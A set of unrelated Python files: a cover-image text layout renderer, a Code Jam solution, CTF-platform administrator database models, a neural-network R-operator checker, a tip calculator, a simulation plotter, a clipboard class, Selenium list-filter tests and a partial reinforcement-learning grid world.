                # for some reason Pillow will not start drawing the text at (0,0).
                # you must specify (0, 0 - offset).
                pad_width, pad_height = self.Font.getoffset(line.Text)
                self.Height = self.Height - pad_height
            # calculate top left corner (x,y) of text
            start_x = ((self.BoundingBoxWidth - adj_width)/2)
            start_y = (self.Height)
            line.StartXY = (start_x, start_y)
            self.Height = self.Height + ((ascender + descender) * self.SpacerPercent *.1)
            if iCount < len(self.Lines) - 1:
                self.Height = self.Height + int(round(descender * .4))

    def DrawText(self, iTotalLineSpace = -1):
        """Recompute line positions, optionally overriding TotalLineSpace."""
        if iTotalLineSpace >= 0:
            self.TotalLineSpace = iTotalLineSpace
        self.SetDimensions()

    def ShrinkText(self, iStep, iTotalLineSpace = -1):
        """Reduce the font size by iStep if it stays positive; return success."""
        bSuccess = False
        if iTotalLineSpace >= 0:
            self.TotalLineSpace = iTotalLineSpace
        if self.FontSize - iStep > 0:
            self.FontSize = self.FontSize - iStep
            self.SetDimensions()
            bSuccess = True
        return bSuccess

    def GrowText(self, iStep, iTotalLineSpace = -1):
        """Increase the font size by iStep (capped below 1000); return success."""
        bSuccess = False
        if iTotalLineSpace >= 0:
            self.TotalLineSpace = iTotalLineSpace
        if self.FontSize + iStep < 1000:
            self.FontSize = self.FontSize + iStep
            self.SetDimensions()
            bSuccess = True
        return bSuccess

    def ShrinkSpacer(self, iStep):
        """Reduce the line spacer percentage by iStep if it stays positive;
        return success."""
        bSuccess = False
        if self.SpacerPercent - iStep > 0:
            self.SpacerPercent = self.SpacerPercent - iStep
            self.SetDimensions()
            bSuccess = True
        return bSuccess

    def DrawLines(self, draw, xOffset = 0, yOffset = 0):
        """Render every line onto the draw context at its computed position,
        shifted by (xOffset, yOffset)."""
        for lineno, line in enumerate(self.Lines):
            draw.text((line.StartXY[0] + xOffset, line.StartXY[1] + yOffset),
                      line.Text,
                      font = self.Font,
                      fill = self.Color)
# Calculate the total box height WITH or WITHOUT spaces
def CalcTotalBoxHeight(boxes, bNoSpaces = False):
    """Sum the heights of all boxes, inserting the minimum spacer height
    between consecutive boxes unless bNoSpaces is True.

    Returns the total rounded to 2 decimals.
    Cleanup: a per-box box.Font.getmetrics() call whose result was never
    used has been removed.
    """
    iSpacerHeight = 0 if bNoSpaces else CalcMinSpacerHeight(boxes)
    iTotalBoxHeight = 0
    for boxno, box in enumerate(boxes):
        iTotalBoxHeight = iTotalBoxHeight + box.Height
        # no spacer before the first box
        if boxno > 0:
            iTotalBoxHeight = iTotalBoxHeight + iSpacerHeight
    return round(iTotalBoxHeight, 2)
def CalcSpaceHeight(iMaxHeight, boxes):
    """Evenly divide the vertical space left after placing all boxes."""
    iLeftover = iMaxHeight - CalcTotalBoxHeight(boxes)
    return int(iLeftover / len(boxes))
def CreateImg(ImgTxtGen):
    """Render a cover image for ImgTxtGen and return it as an RGB PIL image.

    Picks a background profile, lays the template's title lines out as
    vertically-spaced text boxes (shrinking fonts and spacers until they
    fit), draws the author name, and stamps the generator ID patch in the
    top-left corner.  Returns None if ImgTxtGen is not a Generator or the
    background image cannot be loaded.
    """
    # get a random cover profile (the history queue avoids recent repeats)
    if titutil.BGProfileQ is None:
        titutil.BGProfileQ = HistoryQWithLog(titutil.BGPROFILEQ_FILENAME, titutil.BGPROFILEQ_SIZE)
    BGProfile = PickBGProfile(ProfileHistoryQ = titutil.BGProfileQ,
                              ImgTxtGen = ImgTxtGen)
    #print("BGProfile #" + str(BGProfile.ID) + " (" + BGProfile.FileName + ") selected")
    # use to off-center horizontally.
    width_offset = 17
    if isinstance(ImgTxtGen, Generator):
        TitleBoxes = []
        # color and format title lines
        for line in ImgTxtGen.Template.Lines:
            if line is not None and len(line.LineText) > 0:
                # pick the profile color matching the line's role
                Color = "rgba(0, 0, 0, 255)"
                if line.ColorType == LineColorType.MainTitle:
                    Color = BGProfile.MainTitleColor
                elif line.ColorType == LineColorType.SecondTitle:
                    Color = BGProfile.SecondTitleColor
                elif line.ColorType == LineColorType.SmallText:
                    Color = BGProfile.SmallTextColor
                elif line.ColorType == LineColorType.AuthorName:
                    Color = BGProfile.AuthorNameColor
                section = TitleSection(line.LineText,
                                       sFontName = line.FontName,
                                       iFontSize = line.FontMaxSize,
                                       iMaxRows = line.MaxRows,
                                       Color = Color)
                TitleBoxes.append(section)
        # start with the 'half header' background variant
        bg = BGImageHH(BGProfile)
        BGImg = bg.Image
        if BGImg is not None:
            # calculate vertical spacing of title bounded text boxes
            xOffset = XOFFSET + width_offset
            iTotalBoxHeight = 0
            iMinSpacerHeight = 0
            if len(TitleBoxes) > 0:
                for box in TitleBoxes:
                    box.SetDimensions()
                # the minimum vert space height should be the
                # height of the largest descender.
                iMinSpacerHeight = CalcMinSpacerHeight(TitleBoxes)
                # 1. Attempt to fit title sections at max font sizes
                # 2. If title sections WITHOUT SPACES are > the regular
                #    template size, use plain header background
                iTotalBoxHeight = CalcTotalBoxHeight(TitleBoxes)
                # Bug fix: this measurement must exclude spacers
                # (bNoSpaces=True); it previously passed bNoSpaces=False,
                # making it identical to iTotalBoxHeight above.
                iTotalBoxHeightNoSpaces = CalcTotalBoxHeight(TitleBoxes, bNoSpaces = True)
                if iTotalBoxHeightNoSpaces > bg.MaxHeight + 50:
                    bg = BGImagePH(BGProfile)
                    BGImg = bg.Image
                    #print(" - Switched to plain header background.")
                # 3. If title sections don't fit, alternate between:
                #    a. shrink all fonts by 1 and try again
                #    b. shrink all spacers by 1 and try again
                if iTotalBoxHeight > bg.MaxHeight:
                    bBreak = False
                    bEvenLoop = False
                    while iTotalBoxHeight > bg.MaxHeight:
                        if bEvenLoop:
                            bEvenLoop = False
                            # reduce font size
                            for box in TitleBoxes:
                                if not box.ShrinkText(1):
                                    bBreak = True
                                    break
                        else:
                            bEvenLoop = True
                            # reduce spacer size
                            for box in TitleBoxes:
                                if not box.ShrinkSpacer(1):
                                    bBreak = True
                                    break
                        if bBreak:
                            # nothing left to shrink; give up fitting
                            break
                        iTotalBoxHeight = CalcTotalBoxHeight(TitleBoxes)
                        iMinSpacerHeight = CalcMinSpacerHeight(TitleBoxes)
            # calculate the starting height (center the block vertically)
            draw = ImageDraw.Draw(BGImg)
            iyOffsetLine = bg.TitleBoxTop_yOffset + int(round((bg.TitleBoxBottom_yOffset - bg.TitleBoxTop_yOffset - iTotalBoxHeight) / 2))
            # draw the text boxes
            for box in TitleBoxes:
                box.DrawLines(draw, xOffset, iyOffsetLine)
                iyOffsetLine = iyOffsetLine + box.Height + iMinSpacerHeight
            # draw author name at its fixed vertical offset
            AuthorTemplate = ImgTxtGen.Template.AuthorLine
            AuthorNameSection = TitleSection(ImgTxtGen.AuthorName,
                                             sFontName = AuthorTemplate.FontName,
                                             iFontSize = AuthorTemplate.FontMaxSize,
                                             iMaxRows = AuthorTemplate.MaxRows,
                                             Color = BGProfile.AuthorNameColor)
            AuthorNameSection.SetDimensions()
            AuthorNameSection.DrawLines(draw, xOffset, AUTHORNAME_YOFFSET)
            # Write the generator # on the top left corner of the cover
            # (guarded so a missing background can no longer crash this step)
            if ImgTxtGen.ID is not None:
                sGenID = str(ImgTxtGen.ID).zfill(3)
                ImgGenNo = Image.open(PATCH_PATH + "gen_cover_patch.jpg").convert('RGBA')
                GenFont = ImageFont.truetype(FONT_PATH + "NimbusRomNo9L-MedIta.otf", size = int(round(8 * RESOLUTION)), index = 0)
                draw_patch = ImageDraw.Draw(ImgGenNo)
                draw_patch.text((0, 0), sGenID, font = GenFont, fill = "black")
                BGImg.alpha_composite(ImgGenNo, dest=(96, 18))
            return BGImg.convert("RGB")
        else:
            print("ERROR. File name '" + bg.FileName + "' not found for background " + str(bg))
    # not a Generator, or the background image could not be loaded
    return None
#!/usr/bin/env python3
def count(m):
    """Return the first multiple of m at which every decimal digit 0-9 has
    appeared somewhere among the multiples m, 2m, 3m, ...

    Returns the string "INSOMNIA" for m == 0, since no new digits ever
    appear (Code Jam "Counting Sheep").  The 10**100 cap guards against a
    runaway loop, although every positive m terminates long before it.

    Port: the original was Python 2 (raw_input/xrange/print statement and
    integer '/'); the convoluted >10 / ==10 digit-extraction special cases
    have been replaced by a plain digit loop with identical results.
    """
    if m == 0:
        return "INSOMNIA"
    seen = [False] * 10
    remaining = 10
    step = m
    while remaining > 0 and m < 10 ** 100:
        value = m
        # mark every decimal digit of the current multiple
        while value > 0:
            digit = value % 10
            if not seen[digit]:
                seen[digit] = True
                remaining -= 1
            value //= 10
        if remaining == 0:
            break  # return the multiple that completed the digit set
        m += step
    return m


if __name__ == '__main__':
    n = int(input())
    for i in range(n):
        x = int(input())
        print("Case #" + str(i + 1) + ": " + str(count(x)))
|
"""'Administrator's SQLAlchemy model"""
from flask_login import UserMixin
from sqlalchemy import ForeignKey, UniqueConstraint
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import relationship
from JDISCTF.app import DB
from JDISCTF.models.role import Role
class Administrator(UserMixin, DB.Model):
    """
    Administrator model

    An administrator is a person who manages events. Depending on his roles, an administrator can
    create challenges, edit event info, edit event theme, etc. Administrators use a single account
    to manage all events.
    """
    __tablename__ = 'Administrators'

    id = DB.Column(DB.Integer, primary_key=True)
    """The unique ID of the admin. Should be generated by the database. Used as primary key."""
    is_platform_admin = DB.Column(DB.Boolean)
    """
    Defines whether or not the administrator is a platform admin. Platform admins have complete
    access to all of the platform's configuration as well as all events.
    """
    user_id = DB.Column(DB.Integer, ForeignKey('Users.id'), nullable=True, unique=True)
    """The ID of the user account the administrator is associated with. Used as a foreign key."""

    # association rows linking this admin to events (with per-event roles)
    event_administrators = relationship('EventAdministrator')
    # convenience view over the association: the Event objects themselves
    events = association_proxy('event_administrators', 'event')
    user = relationship('User', lazy='joined')

    def is_admin_of_event(self, event_id: int) -> bool:
        """
        :param event_id:
        :return: True if the admin is admin for the given event (platform
                 admins are admins of every event).
        """
        return self.is_platform_admin or event_id in map(lambda x: x.id, self.events)

    def get_roles_for_event(self, event_id: int) -> "set":
        """
        :param event_id:
        :return: The set of all the roles the administrator has for the given event.
                 (Annotation corrected: set().union(...) returns a set, not a list.)
        """
        event_administrators = filter(lambda x: x.event_id == event_id, self.event_administrators)
        roles = map(lambda x: x.roles, event_administrators)
        # flatten the per-association role lists into a single set
        return set().union(*roles)

    def __repr__(self):
        return '<Administrator id:{} is_platform_admin:{} user_id:{}>' \
            .format(self.id, self.is_platform_admin, self.user_id)
class EventAdministrator(DB.Model):
    """
    EventAdministrators model. This is an association table between administrators and events.
    """
    __tablename__ = 'EventAdministrators'

    id = DB.Column(DB.Integer, primary_key=True)
    """The unique ID of the row. Should be generated by the database. Used as primary key."""

    event_id = DB.Column(DB.Integer, ForeignKey('Events.id'), nullable=True)
    """The ID of the Event that this row associates. Used as foreign key."""

    administrator_id = DB.Column(DB.Integer, ForeignKey('Administrators.id'), nullable=True)
    """The ID of the Administrator that this row associates. Used as foreign key."""

    event = relationship('Event', back_populates='event_administrators', lazy='joined')
    administrator = relationship('Administrator', back_populates='event_administrators', lazy='joined')
    roles = relationship('RoleAssociation', back_populates='event_administrator', lazy='joined')

    # A given administrator may be linked to a given event at most once.
    __table_args__ = (
        UniqueConstraint('event_id', 'administrator_id', name='event_administrator_event_administrator_uc'),
    )

    def __repr__(self):
        return '<EventAdministrator id:{} event_id:{} administrator_id:{}>' \
            .format(self.id, self.event_id, self.administrator_id)
|
import numpy as np
import scipy.io
class Sigmoid(object):
    """Logistic sigmoid evaluated at a fixed point x, with derivatives
    up to third order (scalar or elementwise on numpy arrays)."""

    def __init__(self, x):
        self.x = x

    def f(self):
        """sigma(x) = 1 / (1 + exp(-x))."""
        return 1.0 / (1.0 + np.exp(-self.x))

    def df(self):
        """First derivative: sigma * (1 - sigma)."""
        s = self.f()
        return s * (1.0 - s)

    def d2f(self):
        """Second derivative: sigma * (1 - sigma) * (1 - 2*sigma)."""
        s = self.f()
        return s * (1.0 - s) * (1.0 - 2.0 * s)

    def d3f(self):
        """Third derivative: sigma * (1 - sigma) * (6*sigma^2 - 6*sigma + 1)."""
        s = self.f()
        return s * (1.0 - s) * (6.0 * s ** 2 - 6.0 * s + 1.0)
class MeanSquaredError(object):
    """Half sum-of-squares error E = 0.5 * sum((yhat - y)^2) and its
    derivatives with respect to yhat."""

    def __init__(self, yhat, y):
        self.y = y
        self.yhat = yhat

    def f(self):
        """Scalar error value."""
        residual = self.yhat - self.y
        return 0.5 * np.sum(residual ** 2)

    def df(self):
        """dE/dyhat: simply the residual."""
        return self.yhat - self.y

    def d2f(self):
        """Second derivative is identically 1."""
        return 1.0

    def d3f(self):
        """Third derivative is identically 0."""
        return 0.0
class ROp(object):
    """R-operator (Pearlmutter trick) checker for a small feed-forward net.

    Loads inputs, weights and a direction vector v from a MATLAB .mat file,
    runs forward/backward passes that simultaneously propagate first and
    second directional derivatives (R{.} and R^2{.}), and compares the
    resulting gradient / Hessian-vector / vGHv products against reference
    vectors ('g', 'hv', 'vghv') stored in the same file.
    """

    def __init__(self, fname):
        """Load the MATLAB workspace and allocate per-layer result dicts.

        :param fname: path to a .mat file containing x, y, w, b, v (and the
            reference vectors used by the compare methods).
        """
        self.mdict = scipy.io.loadmat(fname)  # import dataset from matlab
        self.x = self.mdict.get('x')
        self.y = self.mdict.get('y')
        self.w = self.mdict.get('w')
        self.b = self.mdict.get('b')
        self.v = self.mdict.get('v')
        self.n = len(self.x)    # units per layer (weights assumed n x n)
        self.len = len(self.w)  # number of layers
        # Per-layer intermediate results, keyed by layer index.
        self.xhat = {}
        self.yhat = {}
        self.dEdy = {}
        self.dEdx = {}
        self.dEdw = {}
        self.rx = {}
        self.ry = {}
        self.rdEdy = {}
        self.rdEdx = {}
        self.rdEdw = {}
        self.r2x = {}
        self.r2y = {}
        self.r2dEdy = {}
        self.r2dEdx = {}
        self.r2dEdw = {}

    def forward(self):
        """Forward pass computing activations together with R{.} and R^2{.}."""
        for i in range(0, self.len):
            # compute x
            if i == 0:
                self.xhat[i] = np.dot(self.w[(i, 0)], self.x)+self.b[(i, 0)]
            else:
                self.xhat[i] = np.dot(self.w[(i, 0)], self.yhat[i-1])+self.b[(i, 0)]
            # compute y
            sig = Sigmoid(self.xhat[i])
            self.yhat[i] = sig.f()
            # compute R{x}: v stores one n*n direction matrix per layer,
            # flattened in column-major (MATLAB) order.
            v = np.reshape(self.v[(i * self.n ** 2):((i + 1) * self.n ** 2)], (self.n, self.n), order='F')
            if i == 0:
                self.rx[i] = np.dot(v, self.x)
            else:
                self.rx[i] = np.dot(v, self.yhat[i-1])
                self.rx[i] += np.dot(self.w[(i, 0)], self.ry[i-1])
            # compute R{y}
            self.ry[i] = np.multiply(self.rx[i], sig.df())
            # compute R^2{x}
            if i == 0:
                self.r2x[i] = 0.0
            else:
                self.r2x[i] = np.dot(self.w[(i, 0)], self.r2y[i-1])
                self.r2x[i] += 2.0*np.dot(v, self.ry[i-1])
            # compute R^2{y}
            self.r2y[i] = np.multiply(self.r2x[i], sig.df()) + np.multiply(np.power(self.rx[i], 2), sig.d2f())

    def backward(self):
        """Backward pass computing dE/d{y,x,w} together with R{.} and R^2{.}."""
        for i in range(self.len-1, -1, -1):
            # check if forward pass computed
            if not self.yhat:
                raise Exception('Run forward pass before backward.')
            # compute dE/dy
            if i == (self.len-1):
                err = MeanSquaredError(self.yhat[i], self.y)
                self.dEdy[i] = err.df()
            else:
                self.dEdy[i] = np.transpose(np.dot(np.transpose(self.dEdx[i+1]), self.w[(i+1, 0)]))
            # compute dE/dx
            sig = Sigmoid(self.xhat[i])
            self.dEdx[i] = np.multiply(sig.df(), self.dEdy[i])
            # compute dE/dw
            if i == 0:
                self.dEdw[i] = np.outer(self.dEdx[i], self.x)
            else:
                self.dEdw[i] = np.outer(self.dEdx[i], self.yhat[i - 1])
            # compute R{dE/dy}
            if i == (self.len - 1):
                self.rdEdy[i] = np.multiply(err.d2f(), self.ry[i])
            else:
                self.rdEdy[i] = np.transpose(np.dot(np.transpose(self.rdEdx[i+1]), self.w[(i+1, 0)]))
                v = np.reshape(self.v[((i + 1) * self.n ** 2):((i + 2) * self.n ** 2)], (self.n, self.n), order='F')
                self.rdEdy[i] += np.transpose(np.dot(np.transpose(self.dEdx[i+1]), v))
            # compute R{dE/dx}
            self.rdEdx[i] = np.multiply(sig.df(), self.rdEdy[i])
            self.rdEdx[i] += np.multiply(np.multiply(self.rx[i], sig.d2f()), self.dEdy[i])
            # compute R{dE/dw}
            if i == 0:
                self.rdEdw[i] = np.outer(self.rdEdx[i], self.x)
            else:
                self.rdEdw[i] = np.outer(self.rdEdx[i], self.yhat[i - 1]) + np.outer(self.dEdx[i], self.ry[i - 1])
            # compute R^2{dE/dy}
            if i == (self.len - 1):
                self.r2dEdy[i] = np.multiply(err.d3f(), np.power(self.ry[i], 2)) + np.multiply(err.d2f(), self.r2y[i])
            else:
                self.r2dEdy[i] = np.transpose(np.dot(np.transpose(self.r2dEdx[i+1]), self.w[(i+1, 0)]))
                self.r2dEdy[i] += 2.0*np.transpose(np.dot(np.transpose(self.rdEdx[i+1]), v))
            # compute R^2{dE/dx}
            self.r2dEdx[i] = 2.0 * np.multiply(np.multiply(self.rx[i], sig.d2f()), self.rdEdy[i])
            self.r2dEdx[i] += np.multiply(sig.df(), self.r2dEdy[i])
            self.r2dEdx[i] += np.multiply(np.multiply(self.r2x[i], sig.d2f()), self.dEdy[i])
            self.r2dEdx[i] += np.multiply(np.multiply(np.power(self.rx[i], 2), sig.d3f()), self.dEdy[i])
            # compute R^2{dE/dw}
            if i == 0:
                self.r2dEdw[i] = np.outer(self.r2dEdx[i], self.x)
            else:
                self.r2dEdw[i] = np.outer(self.r2dEdx[i], self.yhat[i - 1])
                self.r2dEdw[i] += 2.0 * np.outer(self.rdEdx[i], self.ry[i - 1])
                self.r2dEdw[i] += np.outer(self.dEdx[i], self.r2y[i - 1])

    def compute(self):
        """Run the full forward + backward computation."""
        self.forward()
        self.backward()

    def _compare_with_matlab(self, key, grads):
        """Return the norm of the difference between per-layer matrices in
        *grads* (flattened column-major) and the MATLAB reference vector
        stored under *key*.

        Bug fix: the original compare methods called np.reshape on the
        looked-up value BEFORE checking it for None, so a missing key raised
        an opaque reshape ValueError instead of the intended Exception.
        """
        # check if compute performed (checks the dict actually being compared)
        if not grads:
            raise Exception('Run compute before compare.')
        # reformat: flatten each layer's matrix in MATLAB (column-major) order
        flat = []
        for i in range(0, self.len):
            flat.extend(grads[i].flatten(order='F'))
        mat = self.mdict.get(key)  # get value from mdict
        if mat is None:
            raise Exception('%s does not exist in Matlab data file.' % key)
        mat = np.reshape(mat, np.shape(flat), order='F')
        diff = mat - flat            # compute difference
        return np.linalg.norm(diff)  # compute norm

    def compare(self):
        """Norm of the error in the v'Gv-style second-order product."""
        return self._compare_with_matlab('vghv', self.r2dEdw)

    def ropCompare(self):
        """Norm of the error in the Hessian-vector product."""
        return self._compare_with_matlab('hv', self.rdEdw)

    def gradCompare(self):
        """Norm of the error in the plain gradient."""
        return self._compare_with_matlab('g', self.dEdw)
|
"""
Program to calculate tip
total amount is the addition of total bill and amount of the tip that needs to be given
tip is calculated by multiplying total bill with tip percentage and dividing by 100
each person expense is total amount divided by total number of people and round the expense upto two decimal points
"""
print("Welcome to the tip calculator")
total_bill = float(input("What was the total bill? $"))
tip_percentage = float(input("What percentage tip would you like to give? 10, 12, or 15? "))
total_people = int(input("How many people to split the bill? "))
total_amount = total_bill + (total_bill * tip_percentage/100)
each_person_amount = round(total_amount / total_people, 2)
print(f"Each person should pay: ${each_person_amount}")
|
import csv
import numpy as np

# Compare two particle simulations (with and without adaptive time-stepping)
# by plotting, per particle, the distance between the two runs over time.
# Assumes each CSV row holds 4 columns per particle (presumably x, y, z plus
# one extra -- TODO confirm) followed by two trailing columns, with the
# second-to-last column holding the time stamp.
x1 = []
x2 = []
x = []
with open('Data/Output/Data1.csv') as csvfile1:
    read_position = csv.reader(csvfile1, delimiter = ',')
    for row in read_position:
        x1.append(row)
with open('Data/Output/Data2.csv') as csvfile2:
    read_position = csv.reader(csvfile2, delimiter = ',')
    for row in read_position:
        x2.append(row)
# For each particle k, build [time, distance] pairs for every sample i.
for k in range((len(x1[0]) - 2)//4):
    y = []
    for i in range(len(x1)):
        # Euclidean distance between the particle's position in run 1 and run 2.
        distance = np.sqrt((float(x1[i][4*k]) - float(x2[i][4*k]))**2 + (float(x1[i][(4*k)+1]) - float(x2[i][(4*k)+1]))**2 + (float(x1[i][(4*k)+2]) - float(x2[i][(4*k)+2]))**2)
        y.append([x1[i][-2],distance])
    x.append(y)
from matplotlib import pyplot as plt
fig = plt.figure()
ax1 = fig.add_subplot(111)
# One labelled line per particle.
for i in range(len(x)):
    dist = []
    time = []
    for data in x[i]:
        dist.append(data[1])
        time.append(float(data[0]))
    line, = ax1.plot(time,dist)
    line.set_label("Particle " + str(i+1))
ax1.set_xlabel("Time")
ax1.set_ylabel("Distance ")
ax1.set_title("Distance Between Particles Simulated With and Without Adaptive Time-Stepping\nUsing Leap Frogging")
ax1.legend()
plt.show()
|
__version__ = "$Id$"
# Clipboard module.
#
# There is one *global* clipboard object, but it is implemented as a class,
# so you can create multiple instances if you wish.
#
# Unfortunately, there is no link with the X clipboard facility (yet).
#
# The clipboard is not typed: you always specify a list of objects.
# the type of object is known with the 'getClassName' method
# Standard type we currently support
#
# type
#
# 'MMNode' MM subtree (must not have a parent)
# 'Region' MMChannel instance
# 'Viewport' MMChannel instance representing a topLayout
# 'RegionAssociation' MMRegionAssociation instance (LayoutView only)
# 'Properties' MMAttrContainer instance
#
# To implement Cut/Copy/Paste (example with single selection)
#
# 'Cut': use x.Extract() to remove the node from its tree,
# then call setclip([x])
# 'Copy': use y = x.DeepCopy() to make a copy of the tree,
# then call setclip([y])
# 'Paste': insert the actual contents from the clipboard in the tree,
# then *copy* it back to the clipboard:
# list = getclip(); x = list[0]; setclip([x.DeepCopy()])
from Owner import *
class Clipboard:
    """Global clipboard holding a list of document objects.

    Objects placed on the clipboard are tagged with OWNER_CLIPBOARD so the
    rest of the application knows the clipboard is keeping them alive.
    """

    def __init__(self):
        self.__data = []

    def __repr__(self):
        # Bug fix: the old code formatted self.type, an attribute that is
        # never set anywhere, so every repr() raised AttributeError.
        return '<Clipboard instance, data=%r>' % (self.__data,)

    def setclip(self, data):
        """Replace the clipboard contents with *data* (a list or tuple),
        transferring OWNER_CLIPBOARD ownership from the old contents."""
        if not isinstance(data, (tuple, list)):
            print('Clipboard.setclip : data is not a list %r' % (data,))
            return
        for node in self.__data:
            node.removeOwner(OWNER_CLIPBOARD)
        for node in data:
            node.addOwner(OWNER_CLIPBOARD)
        self.__data = data

    def getclip(self):
        """Return the current clipboard contents (no copy)."""
        return self.__data

    def getclipcopy(self):
        """Return the current contents, leaving copies on the clipboard."""
        data = self.getclip()
        new_data = []
        for node in data:
            # Objects without getClassName are silently dropped from the
            # replacement list (original behaviour, preserved here).
            if hasattr(node, 'getClassName'):
                if hasattr(node, 'DeepCopy'):
                    # We return the old one and put the new one on the clipboard
                    new_data.append(node.DeepCopy())
                else:
                    # No DeepCopy method, so we assume the object does not
                    # need to be copied.
                    new_data.append(node)
        # NOTE(review): restoreclip is not defined on this class -- presumably
        # provided by a subclass or monkey-patched; confirm before relying on it.
        self.restoreclip(new_data)
        return data

    def clearclip(self):
        """Empty the clipboard, releasing ownership of its contents."""
        # Calls the base implementation explicitly (original behaviour),
        # bypassing any subclass override of setclip.
        Clipboard.setclip(self, [])
|
import pytest
from .pages.pages import MapPage, LandingPage, ListPage
from .base import FunctionalTestCase
@pytest.mark.usefixtures('activity_changeset')
class ListTests(FunctionalTestCase):
    """Browser (Selenium) tests for the activity list view: attribute
    filtering and spatial filtering by the visible map extent."""

    def test_list_filter(self):
        """Filters narrow the list, and filters added on the map page carry
        over to the list page."""
        # Test that the list can be filtered by attributes.
        a_id_1 = self.create_item(
            item_type='activity', user=self.user_editor1,
            changeset=self.activity_changeset(
                'simple',
                intention='Agriculture'
            ), status='active'
        )
        a_id_2 = self.create_item(
            item_type='activity', user=self.user_editor1,
            changeset=self.activity_changeset(
                'simple',
                intention='Agriculture',
                intended_area=123.5
            ), status='active'
        )
        a_id_3 = self.create_item(
            item_type='activity', user=self.user_editor1,
            changeset=self.activity_changeset(
                'simple',
                intention='Mining',
                intended_area=50
            ), status='active'
        )

        # Start from the landing page to correctly set the location cookie.
        # landing_page = LandingPage(self.driver)
        # self.get_page(landing_page)
        # landing_page.click_entry_button()

        map_page = MapPage(self.driver)
        list_page = ListPage(self.driver)

        # On the list page, there are 3 results (newest first).
        map_page.click_menu_list()
        list_page.check_entries(expected=[
            {
                'identifier': a_id_3
            },
            {
                'identifier': a_id_2
            },
            {
                'identifier': a_id_1
            }
        ])

        # Add a first filter
        list_page.add_filter('Intention of Investment', 'Agriculture')

        # Only 2 entries remain in the list
        list_page.check_entries(expected=[
            {
                'identifier': a_id_2
            },
            {
                'identifier': a_id_1
            }
        ])

        # Filters can also be added on the map page
        list_page.click_menu_map()
        map_page.add_filter(
            'Intended area (ha)', '100', is_text=True, operator='>')

        # Back on the list page, only 1 result remains
        map_page.click_menu_list()
        list_page.check_entries(expected=[
            {
                'identifier': a_id_2
            }
        ])

    def test_list_is_filtered_spatially(self):
        """The list only shows activities inside the map extent currently
        visible, and the extent persists via a cookie."""
        # Test that the list is filtered spatially by the extent currently
        # visible on the map.
        a_id_1 = self.create_item(
            item_type='activity', user=self.user_editor1,
            changeset=self.activity_changeset('simple'), status='active'
        )
        # Second activity far away from the first one.
        a_id_2 = self.create_item(
            item_type='activity', user=self.user_editor1,
            changeset=self.activity_changeset(
                'simple', coordinates=[96.98, 26.25]),
            status='active'
        )

        # Start from the landing page to correctly set the location cookie.
        landing_page = LandingPage(self.driver)
        self.get_page(landing_page)
        landing_page.click_entry_button()

        # For the initial zoom level, there are 2 activities on the map, which
        # are also available in the list view.
        map_page = MapPage(self.driver)
        map_page.click_menu_list()
        list_page = ListPage(self.driver)
        list_page.check_entries(expected=[
            {
                'identifier': a_id_2,
            },
            {
                'identifier': a_id_1,
            }
        ])

        # Back on the map, when zooming in, only 1 activity remains. Also on the
        # list, there is now only 1 entry.
        list_page.click_menu_map()
        for _ in range(5):
            map_page.zoom_in()
        map_page.click_menu_list()
        list_page.check_entries(expected=[
            {
                'identifier': a_id_1,
            }
        ])

        # The current map extent is stored in a cookie. Therefore going to the
        # map and back to the list should return the same spatially filtered
        # list as before.
        list_page.click_menu_map()
        map_page.click_menu_list()
        list_page.check_entries(expected=[
            {
                'identifier': a_id_1,
            }
        ])

        # There is a button to filter by the extent of the profile. Clicking on
        # this brings all results back on the list.
        list_page.click_filter_by_profile()
        list_page.check_entries(expected=[
            {
                'identifier': a_id_2,
            },
            {
                'identifier': a_id_1,
            }
        ])
|
import numpy as np
import lasagne
from lasagne.updates import sgd
from gmllib.helpers import progress_bar
from rllib.environment import Environment
from rllib.agent import Agent
from rllib.space import FiniteStateSpace, FiniteActionSpace
from rllib.parameter_schedule import GreedyEpsilonLinearSchedule
from rllib.q_learning import QLearningAgent, QTableLookup, QNeuralNetwork
from rllib.rl import calculate_optimal_q_dp
from rllib.policy_gradient import PolicyGradientAgent, PolicyNeuralNetworkMultinomial
class SimpleGridWorldStateSpace(FiniteStateSpace):
    """State space of the 4x3 grid world: all cells (i, j) with
    i in 0..3 and j in 0..2."""

    def __init__(self):
        cells = [(i, j) for i in range(4) for j in range(3)]
        FiniteStateSpace.__init__(self, cells)

    def is_goal_state(self, state):
        """The +1 and -1 cells in the rightmost column are terminal."""
        return state in [(3, 1), (3, 2)]

    def get_reward(self, state):
        """+1 at (3, 2), -1 at (3, 1), 0 at the blocked cell (1, 1),
        and a small step cost of -0.04 everywhere else."""
        special_rewards = {(3, 2): 1.0, (3, 1): -1.0, (1, 1): 0.0}
        return special_rewards.get(state, -0.04)

    def get_initial_state(self):
        """Episodes always start in the bottom-left corner."""
        return 0, 0
class SimpleGridWorldActionSpace(FiniteActionSpace):
    """The four grid moves: Left, Right, Up, Down."""

    def __init__(self):
        FiniteActionSpace.__init__(self, actions=['L', 'R', 'U', 'D'])
class SimpleGridWorldEnvironment(Environment):
    def __init__(self):
        """
        This is the example grid world discussed in Chapter 21 of Artificial Intelligence: A Modern Approach
        """
        Environment.__init__(self, state_space=SimpleGridWorldStateSpace())
        # Grid displacement produced by each action.
        self.action_steps = {'L': (-1, 0), 'R': (1, 0), 'U': (0, 1), 'D': (0, -1)}
        # Action actually executed when the intended action slips 90 degrees
        # left/right: (intended, slip direction) -> executed action.
        self.relative_actions = {('L', 'L'): 'D', ('L', 'R'): 'U', ('R', 'L'): 'U', ('R', 'R'): 'D',
                                 ('U', 'L'): 'L', ('U', 'R'): 'R', ('D', 'L'): 'R', ('D', 'R'): 'L'}
        self.x_width = 4
        self.y_width = 3

    def _advance(self, action=None):
        """Apply *action* stochastically and return the resulting state.

        With probability 0.2 the move slips left or right (0.1 each, matching
        the 0.8/0.1/0.1 model in get_next_states); moves into a wall or the
        blocked cell leave the agent in place.
        """
        if np.random.rand() > 0.8:
            err = np.random.choice(['L', 'R'])
            action = self.relative_actions[(action, err)]
        step = self.action_steps[action]
        new_state = (self.current_state[0] + step[0], self.current_state[1] + step[1])
        if self._state_out_of_bounds(new_state):
            new_state = self.current_state
        return new_state

    def _state_out_of_bounds(self, state):
        """True if *state* is outside the grid or is the blocked cell (1, 1)."""
        if state[0] < 0 or state[0] >= self.x_width or state[1] < 0 or state[1] >= self.y_width or state == (1, 1):
            return True
        return False

    def _add_next_state(self, next_states, state_probabilities, state, new_state, prob):
        """Accumulate (new_state, prob) into the transition lists; a blocked
        move keeps the agent in *state* and merges its probability into the
        existing entry for *state* if present."""
        if self._state_out_of_bounds(new_state):
